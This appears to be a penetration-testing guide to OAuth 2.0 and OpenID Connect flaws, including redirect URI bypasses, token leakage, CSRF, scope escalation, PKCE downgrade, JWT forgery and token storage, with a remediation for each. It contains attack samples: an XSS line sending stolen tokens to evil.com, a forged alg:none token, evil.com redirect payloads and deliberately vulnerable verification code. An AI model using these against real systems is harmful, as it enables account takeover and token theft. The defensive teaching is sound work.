TL;DR: OAuth 2.0 and OpenID Connect power authentication and authorization for the majority of modern web applications, but their flexibility creates a massive attack surface when implementations deviate from security best practices. In our penetration testing engagements, we routinely find redirect URI bypasses, missing PKCE, token leakage through referrer headers and browser history, JWT validation failures including the alg:none attack, state parameter omissions enabling CSRF, scope escalation through parameter tampering, and insecure token storage in localStorage. This guide walks through every major OAuth/OIDC vulnerability class we encounter, explains the attack mechanics in detail, provides real-world examples from production applications, and gives concrete remediation guidance for each issue.
Why OAuth 2.0 and OpenID Connect Are Everywhere -- And Why They Are So Frequently Misconfigured
OAuth 2.0 has become the de facto standard for delegated authorization on the web. Published as RFC 6749 in 2012, it replaced a patchwork of proprietary authentication schemes with a single framework that allows users to grant third-party applications limited access to their resources without sharing credentials. OpenID Connect (OIDC), built as an identity layer on top of OAuth 2.0 and finalized in 2014, extended the framework to handle authentication as well, giving applications a standardized way to verify user identity and obtain basic profile information through ID tokens.
The adoption numbers are staggering. Every major identity provider -- Google, Microsoft Entra ID (formerly Azure AD), Okta, Auth0, AWS Cognito, Keycloak, PingIdentity -- implements OAuth 2.0 and OIDC. If your application supports "Sign in with Google" or "Sign in with Microsoft," you are using OIDC. If your API accepts bearer tokens, you are almost certainly using OAuth 2.0. If your mobile application authenticates against a backend API, the authorization code flow with PKCE is the recommended mechanism. SaaS platforms, fintech applications, healthcare portals, e-commerce sites, and internal enterprise tools all rely on these protocols for their core authentication and authorization mechanisms.
The problem is that OAuth 2.0 is a framework, not a protocol in the rigid sense. RFC 6749 deliberately leaves many implementation decisions to developers. It defines multiple grant types (authorization code, implicit, client credentials, resource owner password credentials), allows for extension grants, leaves redirect URI validation rules somewhat flexible, and does not mandate specific token formats. OIDC adds structure with JWTs and discovery endpoints, but it too allows significant implementation flexibility. This flexibility is what made OAuth 2.0 successful -- it can be adapted to web applications, mobile apps, single-page applications, IoT devices, and server-to-server communication. It is also what makes it dangerous.
When we conduct web application penetration tests, we find OAuth/OIDC misconfigurations in a significant majority of applications that implement these protocols. The reasons are consistent across engagements:
- Developers implement OAuth without fully understanding the security model. Many development teams follow quickstart guides or copy-paste configuration from Stack Overflow without understanding why each parameter exists. The
stateparameter looks optional. PKCE seems like unnecessary complexity. Redirect URI validation "works" with a simple string prefix match. These shortcuts create vulnerabilities. - OAuth libraries and SDKs have secure defaults, but developers override them. Well-maintained libraries like
passport.js,spring-security-oauth2, andoauthlibimplement security best practices by default. But developers frequently customize behavior -- adding redirect URIs dynamically, disabling state validation for "simpler" flows, or storing tokens inlocalStoragefor convenience. - Identity providers allow insecure configurations. Many identity providers still support the implicit flow by default, allow wildcard redirect URIs, do not enforce PKCE, and accept
response_type=tokenwithout warning. The provider's default configuration is often not the secure configuration. - The OAuth 2.0 threat model has evolved. The original RFC 6749 threat model did not anticipate many modern attack vectors. Open redirect chains, browser-based token theft through XSS, and sophisticated phishing campaigns that abuse legitimate OAuth flows were not fully addressed until RFC 9700 (OAuth 2.0 Security Best Current Practice) was published. Many applications were built before these updated recommendations existed, and they have not been updated since.
- Microservice architectures multiply the attack surface. In a monolithic application, there might be one OAuth integration point. In a microservice architecture, every service might validate tokens independently, each with its own configuration and potential for error. A JWT validation flaw in a single microservice can compromise the entire system.
The consequence is that OAuth/OIDC vulnerabilities are not theoretical. They are practical, exploitable, and present in production applications right now. In this guide, we walk through every major vulnerability class we encounter in real penetration testing assessments, explain the attack mechanics, provide concrete exploitation techniques, and detail how to fix each issue.
Authorization Code Flow vs. Implicit Flow: A Security Analysis
Understanding the security properties of different OAuth 2.0 grant types is foundational to understanding why certain vulnerabilities exist. The two flows most relevant to web applications -- the authorization code flow and the implicit flow -- have fundamentally different security characteristics.
The Authorization Code Flow
The authorization code flow is the recommended grant type for server-side web applications and, when combined with PKCE, for single-page applications and mobile apps. The flow operates in two phases:
Phase 1 -- Authorization Request: The client application redirects the user's browser to the authorization server's /authorize endpoint with parameters including response_type=code, client_id, redirect_uri, scope, and state. The user authenticates with the authorization server and grants consent. The authorization server redirects the user back to the client's redirect_uri with a short-lived authorization code in the query string.
Phase 2 -- Token Exchange: The client application makes a back-channel (server-to-server) HTTP POST request to the authorization server's /token endpoint, presenting the authorization code along with its client_id and client_secret. The authorization server validates the code and credentials, then returns an access token (and optionally a refresh token and ID token) in the HTTP response body.
The security properties of this flow are significant. The access token is never exposed to the user's browser. It travels only over the back-channel between the client server and the authorization server. The authorization code is exposed in the browser's URL bar and potentially in server logs, but it is short-lived (typically 30-60 seconds), single-use, and cannot be exchanged for tokens without the client secret. An attacker who intercepts the authorization code through a referrer header or browser history still cannot obtain tokens without also compromising the client secret.
The Implicit Flow
The implicit flow was designed for browser-based applications (single-page applications) that could not securely store a client secret. Instead of returning an authorization code, the authorization server returns the access token directly in the URL fragment (#access_token=...) of the redirect URI. There is no back-channel token exchange.
The security problems with this approach are severe:
- Token exposure in browser history. The access token appears in the URL fragment. While fragments are not sent to servers in HTTP requests, they are stored in the browser's history. Any user of the same browser, or any browser extension with history access, can retrieve the token.
- Token exposure via referrer headers. If the page that receives the token contains any external resources (images, scripts, analytics tags), the full URL including the fragment may be sent in the
Refererheader to third-party servers. Although RFC 7231 states that fragments should not be included in theRefererheader, some browsers and proxy configurations do not strip them correctly, and JavaScript on the page can accesswindow.location.hashand transmit it to any server. - No client authentication. Since there is no back-channel exchange, the authorization server cannot verify that the token is being delivered to the legitimate client. An attacker who tricks the user into authorizing a malicious application can receive the token directly.
- No token binding. The implicit flow provides no mechanism to bind the token to the specific client instance that initiated the request. Tokens can be replayed from any context.
- Token substitution attacks. An attacker can inject a stolen token into a legitimate client's flow, impersonating the victim. Without a back-channel exchange that includes client credentials, the client has no way to verify the token's provenance.
RFC 9700 (OAuth 2.0 Security Best Current Practice) explicitly states: "The implicit grant (response type 'token') and other response types causing the authorization server to issue access tokens in the authorization response are vulnerable to access token leakage and access token replay." The recommendation is clear: do not use the implicit flow. Use the authorization code flow with PKCE instead, even for single-page applications.
What we find in practice: Despite the implicit flow being formally deprecated for years, we still encounter it in approximately 20-30% of penetration testing engagements involving OAuth. The most common scenarios are legacy single-page applications built before PKCE adoption, applications using older versions of identity provider SDKs that default to the implicit flow, and applications where developers chose response_type=token because it required fewer steps to implement. Many identity providers (including some enterprise Entra ID configurations) still allow the implicit flow to be enabled with a single checkbox.
The Hybrid Flow
OIDC also defines hybrid flows that combine elements of both the authorization code and implicit flows. For example, response_type=code token returns both an authorization code and an access token in the front channel. While the authorization code can still be exchanged securely on the back channel, the access token exposed in the front channel suffers from all the same vulnerabilities as the implicit flow. Hybrid flows should be used with extreme caution, and in most cases, the pure authorization code flow with PKCE is preferable.
Redirect URI Validation Bypass Techniques
Redirect URI validation is the single most critical security control in the OAuth 2.0 authorization flow. When a user completes authentication, the authorization server redirects their browser back to the client application's redirect_uri along with an authorization code or token. If an attacker can manipulate the redirect_uri to point to a server they control, they receive the authorization code or token instead of the legitimate client.
RFC 6749 requires that the authorization server validate the redirect URI against pre-registered values. However, the specification allows for both exact match and partial match validation, and many implementations get this wrong. Here are the bypass techniques we use in penetration tests, ordered by frequency of success:
Subdomain Matching Bypass
Many authorization servers validate the redirect URI by checking if it matches the registered domain. If the registered redirect URI is https://app.example.com/callback, the server might accept any subdomain of example.com. An attacker who controls https://evil.example.com (perhaps through a subdomain takeover or a compromised subdomain) can set redirect_uri=https://evil.example.com/callback and receive the authorization code.
In practice, subdomain takeovers are extremely common. Organizations frequently have dangling DNS records pointing to deprovisioned cloud resources (AWS Elastic Beanstalk, Azure App Service, Heroku, GitHub Pages). If the CNAME record still exists but the resource has been deleted, an attacker can claim that resource and receive traffic for the subdomain. When combined with a loose redirect URI validation, this becomes a direct path to account takeover.
Path Traversal and Open Redirect Chains
If the authorization server validates only the scheme, host, and port of the redirect URI but allows arbitrary paths, an attacker can abuse open redirect vulnerabilities on the legitimate domain. Consider a registered redirect URI of https://app.example.com/oauth/callback. If the application has an open redirect at https://app.example.com/goto?url=https://evil.com, the attacker can set:
redirect_uri=https://app.example.com/goto?url=https://evil.com
The authorization server sees that the redirect URI is on app.example.com and accepts it. The user's browser follows the redirect to app.example.com/goto, which then redirects to evil.com with the authorization code or token in the URL. This is one of the most reliable bypass techniques because open redirect vulnerabilities are extremely common, and many security teams classify them as low-severity issues that do not warrant immediate remediation.
URL Parsing Inconsistencies
Different URL parsers handle edge cases differently, and these inconsistencies can be exploited to bypass redirect URI validation. Common techniques include:
- Userinfo component: The URL
https://[email protected]/callbackmight be parsed differently by the authorization server (which sees the host asapp.example.com) and the browser (which sees the host asevil.comwithapp.example.comas the userinfo component). - Backslash confusion: Some parsers treat backslashes as path separators while others treat them as part of the hostname. The URL
https://app.example.com\@evil.commay bypass validation on some servers. - Unicode normalization: Characters like the Unicode full-width solidus (
%EF%BC%8F) or other Unicode characters that normalize to/or.can confuse validation logic. - Fragment injection: Adding a fragment (
#) to the redirect URI can cause the authorization code to be appended after the fragment, making it accessible only to JavaScript on the page rather than being sent to the server. This can be combined with XSS on the target page. - Null byte injection: In some implementations, a null byte (
%00) can truncate the URL during validation but not during the actual redirect, allowing the attacker to append a malicious domain after the null byte.
Wildcard and Prefix Matching
Some identity providers allow wildcard patterns in redirect URI registrations. A registration like https://app.example.com/* or even https://*.example.com/callback gives attackers significant flexibility. Even without explicit wildcards, many authorization servers implement prefix matching, accepting any URL that begins with the registered redirect URI. If the registered URI is https://app.example.com/callback, the server might accept https://app.example.com/callback.evil.com or https://app.example.com/callback/../../../evil-path.
Localhost and Custom Scheme Bypasses
For mobile applications and desktop applications, OAuth 2.0 allows redirect URIs using custom URI schemes (e.g., myapp://callback) or http://localhost with a dynamic port. If the authorization server accepts http://localhost as a valid redirect URI for a web application, an attacker running a local HTTP server on the victim's machine (through malware or a compromised browser extension) can intercept the authorization code. Similarly, custom URI schemes on mobile platforms can be claimed by malicious applications through scheme hijacking on Android or through similar techniques on other platforms.
Pentester's note: When testing redirect URI validation, we always start by modifying the redirect_uri parameter systematically: changing the path, adding subdomains, injecting URL-encoded characters, testing with and without trailing slashes, adding query parameters, inserting fragments, and testing every URL parsing edge case. We also enumerate all open redirects on the application domain, as these are frequently the easiest path to a redirect URI bypass. Tools like Burp Suite's Collaborator can confirm out-of-band that redirected requests are reaching an attacker-controlled server.
Token Leakage via Referrer Headers, Browser History, and Logs
Even when the OAuth flow itself is implemented correctly, tokens and authorization codes can leak through side channels. Token leakage is a category of vulnerability where sensitive OAuth artifacts end up in locations accessible to attackers, often without any direct exploitation of the OAuth implementation itself.
Referrer Header Leakage
When the authorization server redirects the user back to the client application with an authorization code in the query string (e.g., https://app.example.com/callback?code=abc123&state=xyz), the full URL is stored in the browser as the current page's URL. If that callback page loads any external resources -- third-party JavaScript, analytics scripts, tracking pixels, social media widgets, or even a single image hosted on a CDN -- the browser sends the full URL in the Referer header to the server hosting that resource.
This means the authorization code is sent to every third-party server referenced by the callback page. If any of those third-party services are compromised, or if the third party logs referrer headers (which most analytics services do), the authorization code is available to the third party. If the authorization code has not yet been exchanged for tokens and has not expired, the third party can exchange it themselves.
The same issue affects the implicit flow even more severely. When the access token is in the URL fragment, it is accessible to any JavaScript on the page. While the fragment is not normally sent in the Referer header, any script on the callback page can read window.location.hash and transmit the token to an external server. If the callback page includes a compromised third-party script (a supply chain attack), the access token is immediately exfiltrated.
The mitigation for referrer leakage is straightforward: set the Referrer-Policy header to no-referrer or strict-origin on the callback page, and minimize external resources loaded on that page. Better yet, use the response_mode=form_post parameter, which causes the authorization server to deliver the authorization code via an HTTP POST to the callback URL rather than as a query parameter in a redirect. POST body parameters are never included in referrer headers.
Browser History Leakage
Every redirect in the OAuth flow creates an entry in the browser's history. The authorization code (in the query string) and tokens (in the URL fragment for implicit flows) are preserved in this history. On shared computers, kiosk terminals, or any device where multiple users access the same browser profile, this history is accessible to subsequent users. Even on personal devices, browser history is often synced across devices through browser profile synchronization (Chrome Sync, Firefox Sync, Safari iCloud), potentially exposing tokens on devices with weaker security controls.
After successfully exchanging the authorization code, the client application should immediately redirect the user to a clean URL (without the code in the query string) using history.replaceState() or a server-side redirect. This removes the authorization code from the browser's history and address bar. We frequently find that applications skip this step, leaving valid (or recently valid) authorization codes in the browser history indefinitely.
Server Log Leakage
Web server access logs typically record the full URL of every request, including query string parameters. If authorization codes are delivered via query string (the default for the authorization code flow), they are recorded in the web server logs of the client application. These logs are often stored in plaintext, retained for extended periods, accessible to operations and development teams, and may be shipped to centralized logging services (Splunk, ELK Stack, Datadog) where they are retained and indexed.
In one engagement, we found authorization codes stored in an Elasticsearch cluster that was accessible without authentication from the internal network. The codes were single-use and short-lived, so direct exploitation was not possible. However, the logging infrastructure also captured the full HTTP request including the Authorization: Bearer header for subsequent API calls. The access tokens in those logs were long-lived (24 hours) and could be replayed directly. This is a common pattern: even if the OAuth flow is secure, the tokens are only as secure as the infrastructure that handles them after issuance.
Error Page Leakage
When the OAuth callback encounters an error, many applications display a debug error page that includes the request parameters -- including the authorization code. If these error pages are served in production (a common misconfiguration), the authorization code is displayed in the page source and may be cached by CDNs, proxies, or search engine crawlers. We have also seen authorization codes leaked through stack traces in error reporting services like Sentry and Bugsnag, where the full request URL is captured as part of the error context.
State Parameter CSRF Attacks
The state parameter in OAuth 2.0 serves as a CSRF protection mechanism. Without it, an attacker can force a victim to complete an OAuth flow that links the victim's account to the attacker's identity provider account, or that authenticates the victim into the attacker's account on the client application.
How the Attack Works
The attack exploits the fact that the OAuth authorization flow involves a redirect from the client application to the authorization server and back. An attacker can initiate an OAuth flow, authenticate with their own credentials, receive an authorization code, and then trick the victim into completing the flow by visiting the callback URL with the attacker's authorization code.
Here is the step-by-step attack for a login CSRF scenario:
- The attacker initiates the OAuth login flow on the target application.
- The attacker authenticates with their own credentials at the identity provider.
- The identity provider redirects the attacker's browser to the callback URL:
https://app.example.com/callback?code=ATTACKER_CODE. - The attacker intercepts this redirect (using a proxy or by pausing the flow) and does not complete it.
- The attacker sends the callback URL to the victim (via email, chat, or embedding it in a web page as an image tag or iframe).
- The victim's browser follows the URL, and the target application exchanges the authorization code for tokens -- tokens associated with the attacker's account.
- The victim is now logged into the application as the attacker. Any data the victim enters (personal information, payment details, documents) is accessible to the attacker.
This is known as "login CSRF" and is more common than many developers realize. The impact depends on the application: in a note-taking application, the attacker sees everything the victim writes. In a financial application, the victim might link their bank account to the attacker's session. In a cloud storage application, the victim uploads sensitive files to the attacker's account.
Account Linking CSRF
A more dangerous variant occurs when an application allows linking multiple identity providers to a single account (e.g., "Connect your Google account" or "Link your GitHub account"). If the linking flow does not verify the state parameter, an attacker can force the victim to link the attacker's identity provider account to the victim's application account. After the link is complete, the attacker can log in as the victim using their own identity provider credentials.
We find this vulnerability frequently in applications that allow social login connections. The "connect" flow is often implemented as an afterthought, with less rigorous security review than the primary login flow.
Proper State Parameter Implementation
The state parameter must be:
- Unpredictable: Generated using a cryptographically secure random number generator. A minimum of 128 bits of entropy is recommended.
- Bound to the user's session: The state value must be stored in the user's session (server-side) or in an HTTP-only, secure cookie before the authorization request. When the callback is received, the application must verify that the state parameter matches the stored value.
- Single-use: Each state value should be used only once. After validation, it should be deleted from the session to prevent replay.
- Present on every flow: The state parameter must be included in every authorization request, not just login flows. Account linking, permission re-authorization, and scope upgrade flows all require state parameter protection.
What we find in practice: The most common state parameter issues we encounter are: (1) the state parameter is omitted entirely, (2) the state parameter is present but not validated on the callback, (3) the state parameter is a predictable value like the user's session ID or a sequential counter, (4) the state parameter is validated but not bound to the session (stored in localStorage where it can be overwritten by the attacker through XSS), and (5) the state parameter is correctly implemented for the login flow but missing from account linking or re-authorization flows.
Scope Escalation and Consent Screen Bypass
OAuth 2.0 scopes define the level of access that a client application requests. When a user authorizes an application, the consent screen displays the requested scopes (e.g., "This application wants to read your email" or "This application wants to manage your repositories"). The user can then make an informed decision about whether to grant access. Scope escalation attacks attempt to obtain broader access than the user intended to grant.
Scope Parameter Tampering
The most straightforward scope escalation attack involves modifying the scope parameter in the authorization request. If a legitimate application requests scope=email profile, an attacker who controls the authorization request (through a man-in-the-middle position, XSS, or by directly crafting a malicious link) can change it to scope=email profile admin or scope=email profile https://www.googleapis.com/auth/admin.directory.user.
Whether this works depends on the authorization server's behavior. Well-configured authorization servers will display the elevated scope on the consent screen, giving the user an opportunity to reject the request. However, several scenarios bypass this protection:
- Pre-approved scopes: If the user has previously approved a scope for a given application, many authorization servers do not show the consent screen again for that scope, even if additional scopes are added. An attacker who adds scopes incrementally can escalate access without ever triggering a consent prompt for the elevated scope.
- Organizational consent: In enterprise identity providers like Microsoft Entra ID, an administrator can grant "admin consent" for an application, pre-approving all requested scopes for all users in the organization. If admin consent has been granted, scope escalation occurs silently.
- Dynamic scope registration: Some identity providers allow applications to register new scopes at runtime. If the application's client registration endpoint is not properly secured, an attacker can register additional scopes and then request them.
- Scope aliasing and inheritance: Some authorization servers implement scope hierarchies where a broad scope implicitly includes narrower scopes. Requesting
scope=adminmight silently includeread,write, anddeletewithout displaying each one individually on the consent screen.
Consent Screen Bypass
Some OAuth implementations allow bypassing the consent screen entirely under certain conditions:
- The
prompt=noneparameter: OIDC defines thepromptparameter to control the authorization server's behavior.prompt=nonerequests silent authentication -- if the user is already authenticated and has previously consented, the authorization server redirects directly to the callback with an authorization code, without showing any UI. If a first-party application is configured as "trusted" and always receives silent consent, scope escalation via parameter tampering becomes completely invisible. - First-party application trust: Many authorization servers allow marking certain applications as "first-party" or "trusted," which skips the consent screen entirely. If an attacker can register a malicious application with the same
client_idas a trusted application (through a registration flaw), or if the trusted application has an open redirect that can be chained with a redirect URI bypass, consent is never shown. - The
approval_prompt=autoparameter: Google's OAuth implementation historically used this parameter (now deprecated in favor ofprompt). When set toauto, consent was shown only if the user had not previously approved the exact set of scopes. This allowed incremental scope escalation: request one new scope at a time, and the consent screen only mentions the single new scope, not the cumulative access being granted.
Token Scope Verification Failures
Even when scopes are properly requested and consented, the resource server (API) must verify that the access token's scope is sufficient for the requested operation. In many implementations, the resource server does not validate scopes at all -- any valid access token is accepted for any API endpoint, regardless of the scopes it was granted. This effectively makes scopes a cosmetic feature rather than a security control.
In one engagement, we obtained an access token with scope=read and successfully used it to call write and delete API endpoints because the API gateway only verified the token's signature and expiration, not its scope claims. This is particularly common in microservice architectures where each service validates the JWT independently but only checks the signature, not the payload claims.
PKCE: What It Solves and When It Is Missing
Proof Key for Code Exchange (PKCE, pronounced "pixie") was introduced in RFC 7636 to address a specific vulnerability in the authorization code flow: authorization code interception. While the authorization code flow is more secure than the implicit flow because the access token is exchanged on the back channel, the authorization code itself is still delivered through the front channel (the user's browser) and can be intercepted.
The Authorization Code Interception Problem
In the standard authorization code flow without PKCE, the security of the flow relies on two factors: possession of the authorization code and possession of the client secret. For confidential clients (server-side applications), the client secret is stored securely on the server, and an attacker who intercepts the authorization code cannot exchange it without the secret.
But for public clients -- mobile applications, single-page applications, desktop applications -- there is no client secret. The application's source code is accessible to the user (and therefore to attackers), so any embedded secret can be extracted. Without a client secret, the only thing preventing an attacker from exchanging a stolen authorization code is the code itself.
Authorization code interception can happen in several ways:
- Custom URI scheme hijacking on mobile: On Android, any application can register to handle a custom URI scheme. If the legitimate application uses
myapp://callbackas its redirect URI, a malicious application can register the same scheme and intercept the redirect containing the authorization code. - Referrer header leakage: As discussed earlier, the authorization code in the query string can leak through referrer headers to third-party servers.
- Browser history and log access: The authorization code is visible in browser history and server logs.
- Network-level interception: On non-HTTPS connections (which should never be used but occasionally are), the authorization code can be intercepted by network attackers.
How PKCE Works
PKCE adds a proof-of-possession mechanism to the authorization code flow. The process works as follows:
- The client generates a cryptographically random string called the
code_verifier(between 43 and 128 characters from the unreserved character set). - The client computes the
code_challengeby applying a SHA-256 hash to thecode_verifierand Base64URL-encoding the result. (Theplainmethod -- where the challenge equals the verifier -- is also defined but provides weaker security.) - The client includes the
code_challengeandcode_challenge_method=S256in the authorization request. - The authorization server stores the
code_challengeassociated with the authorization code it issues. - When the client exchanges the authorization code for tokens, it includes the original
code_verifierin the token request. - The authorization server hashes the received
code_verifier, compares it to the storedcode_challenge, and only issues tokens if they match.
The key insight is that the code_challenge is sent in the authorization request (which is public), but the code_verifier is sent only in the token exchange request (which is direct from client to server). An attacker who intercepts the authorization code does not have the code_verifier and cannot compute it from the code_challenge (because SHA-256 is a one-way function). Therefore, the intercepted authorization code is useless.
When PKCE Is Missing
Despite being recommended for all clients (including confidential clients) since RFC 9700, PKCE adoption remains incomplete. In our assessments, we find PKCE missing in the following scenarios:
- Server-side applications relying solely on client secrets: Many developers believe that PKCE is only necessary for public clients. While the client secret does protect against basic code interception, PKCE provides defense-in-depth. If the client secret is leaked (through a configuration file in a public repository, a server-side vulnerability, or an insider threat), PKCE prevents authorization code interception even without the secret.
- Legacy identity provider configurations: Older OAuth implementations (especially those predating RFC 7636) do not support PKCE. Some organizations still use these systems and have not upgraded.
- Mobile applications using web views: Some mobile applications implement OAuth through embedded web views rather than the system browser. These implementations often skip PKCE because the developer assumes the web view is a controlled environment. In reality, embedded web views have weaker security isolation than the system browser and are more susceptible to code interception.
- PKCE downgrade attacks: Some authorization servers accept PKCE but do not require it. An attacker who initiates the OAuth flow (perhaps through a CSRF attack) can simply omit the
code_challengeparameter, and the server will issue an authorization code that can be exchanged without acode_verifier. The authorization server should be configured to require PKCE for all flows.
Critical finding: The PKCE downgrade attack is one of the most underappreciated OAuth vulnerabilities. We have encountered multiple identity providers where PKCE is "supported" but not "enforced." In these configurations, PKCE provides no security benefit because an attacker can simply strip the PKCE parameters from the authorization request. Always verify that the authorization server is configured to require PKCE, not merely accept it.
JWT Validation Failures: alg:none, Key Confusion, and Signature Stripping
JSON Web Tokens (JWTs) are the standard token format for OpenID Connect ID tokens and are widely used for OAuth 2.0 access tokens. A JWT consists of three Base64URL-encoded parts separated by periods: the header (specifying the algorithm and token type), the payload (containing claims like issuer, subject, audience, and expiration), and the signature. The security of JWTs depends entirely on proper signature validation. When validation is flawed, attackers can forge tokens and impersonate any user.
The alg:none Attack
The JWT specification (RFC 7519) defines an "unsecured JWT" where the algorithm in the header is set to "alg": "none" and the signature section is empty. This was intended for use cases where the JWT is transported over a secure channel and integrity is guaranteed by other means. In practice, this feature has been a source of critical vulnerabilities.
The attack is simple: take a valid JWT, decode the header, change the alg field to "none", modify the payload claims as desired (e.g., change the sub claim to an administrator's user ID), re-encode the header and payload, and remove the signature (leaving the trailing period). If the server accepts alg:none, the forged token is accepted as valid.
# Original JWT header
{"alg": "RS256", "typ": "JWT"}
# Modified header
{"alg": "none", "typ": "JWT"}
# Forged token (note the empty signature after the trailing period)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImlhdCI6MTcxMjYyMDgwMH0.
This vulnerability was first widely publicized in 2015 when Auth0 researcher Tim McLean discovered that many JWT libraries, including the widely-used jsonwebtoken (Node.js), PyJWT (Python), and ruby-jwt (Ruby), accepted alg:none by default. The affected libraries have since been patched, but custom JWT validation code, older library versions, and misconfigured validation settings continue to exhibit this vulnerability.
Variations of the alg:none attack include using different capitalizations ("None", "NONE", "nOnE") to bypass case-sensitive blocklists, and using URL-encoding or whitespace padding to evade signature checks.
RSA/HMAC Key Confusion (Algorithm Substitution)
This attack exploits a fundamental difference between symmetric and asymmetric signature algorithms. When a JWT is signed with RSA (e.g., RS256), the authorization server uses its private key to sign the token, and the client or resource server uses the corresponding public key to verify the signature. The public key is, by definition, public -- it is often available at the authorization server's JWKS endpoint (/.well-known/jwks.json).
When a JWT is signed with HMAC (e.g., HS256), the same secret key is used for both signing and verification.
The attack works as follows:
- The target application normally uses
RS256to verify JWTs and is configured with the authorization server's RSA public key. - The attacker obtains the RSA public key (from the JWKS endpoint or the server's TLS certificate).
- The attacker creates a JWT with
"alg": "HS256"in the header and the desired claims in the payload. - The attacker signs the JWT using HMAC-SHA256 with the RSA public key as the HMAC secret.
- When the server receives the token, a vulnerable JWT library reads the
algheader, seesHS256, and uses the configured key (the RSA public key) as the HMAC verification key. Since the attacker signed the token with the same key, the signature is valid.
This attack is devastating because the RSA public key is public knowledge, meaning any attacker can forge valid tokens for any user. The fix is straightforward: the verification code must enforce the expected algorithm and never trust the alg header from the token itself. Modern JWT libraries provide an algorithms parameter that restricts which algorithms are accepted during verification.
Signature Stripping
Some JWT implementations have a flaw where they validate the signature only if one is present. If the signature section of the JWT is completely removed (not just empty, but absent -- resulting in only two Base64URL-encoded sections separated by a single period), the validation logic may treat the token as unsigned and accept it without any verification.
This differs from the alg:none attack in that the header may still specify RS256 or another algorithm, but the signature is simply not present. The vulnerable code path typically looks like:
parts = token.split('.')
if len(parts) == 3:
verify_signature(parts[0], parts[1], parts[2])
# If only 2 parts, signature verification is skipped entirely
payload = decode(parts[1])
JWK Injection and jku/x5u Header Manipulation
The JWT header can include a jwk (JSON Web Key) claim that embeds the verification key directly in the token, a jku (JWK Set URL) claim that points to a URL containing the verification keys, or an x5u (X.509 URL) claim that points to a certificate chain. If the verification code trusts these claims without restriction:
- JWK injection: The attacker generates their own RSA key pair, includes the public key in the JWT's
jwkheader, signs the token with their private key, and the server uses the attacker-provided public key to verify the signature. Since the attacker controls both the signing key and the verification key, the signature is always valid. - JKU/X5U manipulation: The attacker sets the
jkuorx5uheader to a URL they control, hosts a JWKS or certificate at that URL containing their public key, and signs the token with their private key. The server fetches the attacker's key from the attacker's URL and uses it to verify the signature.
Mitigations include ignoring jwk, jku, and x5u headers in incoming tokens, using locally configured keys for verification, and if JWKS URLs must be dynamic, restricting them to a whitelist of trusted URLs.
Expired and Replayed Tokens
JWTs include an exp (expiration time) claim, but not all servers validate it. We regularly find servers that accept expired tokens, sometimes months or years after they were issued. Combined with token leakage from logs or browser history, this means that old tokens can be replayed to gain access.
Similarly, the aud (audience) claim should be validated to ensure the token was intended for the specific resource server. If a token issued for api-a.example.com is accepted by api-b.example.com, an attacker with access to any service in the ecosystem can use their tokens to access other services. This is known as a confused deputy attack.
Testing approach: When we test JWT validation, we use a systematic methodology: (1) test alg:none with multiple capitalizations, (2) test RSA/HMAC key confusion if the public key is available, (3) test JWK injection and JKU/X5U manipulation, (4) test with expired tokens, (5) test with tokens issued for a different audience, (6) modify individual claims (sub, role, permissions) and verify whether the server detects tampering, (7) test with completely invalid signatures to ensure signature verification is not bypassed. Tools like jwt_tool by ticarpi automate many of these tests.
Token Storage Mistakes: localStorage vs. httpOnly Cookies
How and where an application stores OAuth tokens after obtaining them is a critical security decision. The two most common storage mechanisms for browser-based applications are localStorage and HTTP-only cookies, and they have fundamentally different security properties.
The localStorage Problem
localStorage is a browser API that provides persistent key-value storage per origin. It is synchronous, easy to use, and available in all modern browsers. It is also the most common token storage mechanism we find in single-page applications. Unfortunately, it is also the least secure.
The fundamental problem with localStorage is that it is accessible to any JavaScript running on the page. If an attacker achieves cross-site scripting (XSS) on the application, they can read every token stored in localStorage with a single line of JavaScript:
// Attacker's XSS payload
fetch('https://evil.com/steal?token=' + localStorage.getItem('access_token'));
XSS vulnerabilities are extremely common. They appear in the OWASP Top 10 and are present in a substantial percentage of the web applications we test. Storing tokens in localStorage means that any XSS vulnerability -- reflected, stored, or DOM-based -- is automatically escalated to a complete account takeover. The attacker does not need to perform any additional steps; they simply read the token and use it from their own machine.
Additional problems with localStorage:
- Persistence: Tokens stored in
localStoragepersist until explicitly deleted. If a user's session is terminated server-side (logout, password change, session revocation), the token inlocalStorageremains valid until it expires. This makes server-side session invalidation ineffective. - No expiration mechanism:
localStoragehas no built-in expiration. The application must implement its own expiration logic, and developers frequently forget to do so. - Browser extension access: Browser extensions with sufficient permissions can read
localStoragefor any origin. - Shared device risk: On shared devices,
localStoragepersists across browser sessions. If the user does not explicitly log out, the next user of the device can access the stored tokens.
sessionStorage -- Marginally Better
sessionStorage is similar to localStorage but scoped to the browser tab and cleared when the tab is closed. This mitigates the persistence and shared device risks, but it is still fully accessible to JavaScript and therefore vulnerable to XSS. It is a marginal improvement, not a solution.
HTTP-Only Secure Cookies
The recommended approach for browser-based applications is to store tokens in HTTP-only, secure, same-site cookies. The security properties are significant:
HttpOnlyflag: Prevents JavaScript from accessing the cookie. XSS attacks cannot read the token. This is the single most important protection against token theft via XSS.Secureflag: Ensures the cookie is only sent over HTTPS, preventing network-level interception.SameSiteattribute: Controls whether the cookie is sent with cross-origin requests.SameSite=Strictprevents the cookie from being sent on any cross-origin request, which mitigates CSRF but can break legitimate cross-origin flows.SameSite=Laxsends the cookie on top-level navigations but not on cross-origin POST requests or subresource requests, providing a good balance of security and usability.- Automatic expiration: Cookies have built-in expiration through the
Max-AgeorExpiresattributes. - Automatic transmission: The browser automatically includes cookies in requests to the matching domain, so the application does not need to manually attach the token to each API request. This eliminates an entire class of bugs where developers forget to include the authorization header.
The Backend-for-Frontend (BFF) Pattern
For single-page applications that use an authorization code flow, the recommended architecture is the Backend-for-Frontend (BFF) pattern. In this pattern, the SPA communicates with a lightweight backend server (the BFF) that handles the OAuth flow. The BFF stores the access token and refresh token server-side (in a session store), and the SPA authenticates to the BFF using an HTTP-only session cookie. The access token never reaches the browser.
This pattern provides the strongest security because tokens are never exposed to client-side JavaScript. The BFF acts as a confidential client (it has a client secret), can use PKCE for additional protection, and can implement token rotation and revocation without relying on client-side logic. The main drawback is the additional infrastructure complexity of maintaining a backend server for what would otherwise be a purely client-side application.
What we report: When we find tokens stored in localStorage, we report it as a medium-severity finding if no XSS vulnerability is present (because the risk is conditional on XSS), and as a high-severity finding if XSS is also present (because the combination enables direct account takeover). We always recommend migrating to HTTP-only cookies or the BFF pattern regardless of whether XSS is currently present, because XSS is a when-not-if proposition for most web applications.
Real-World Examples of OAuth Vulnerabilities in Production Applications
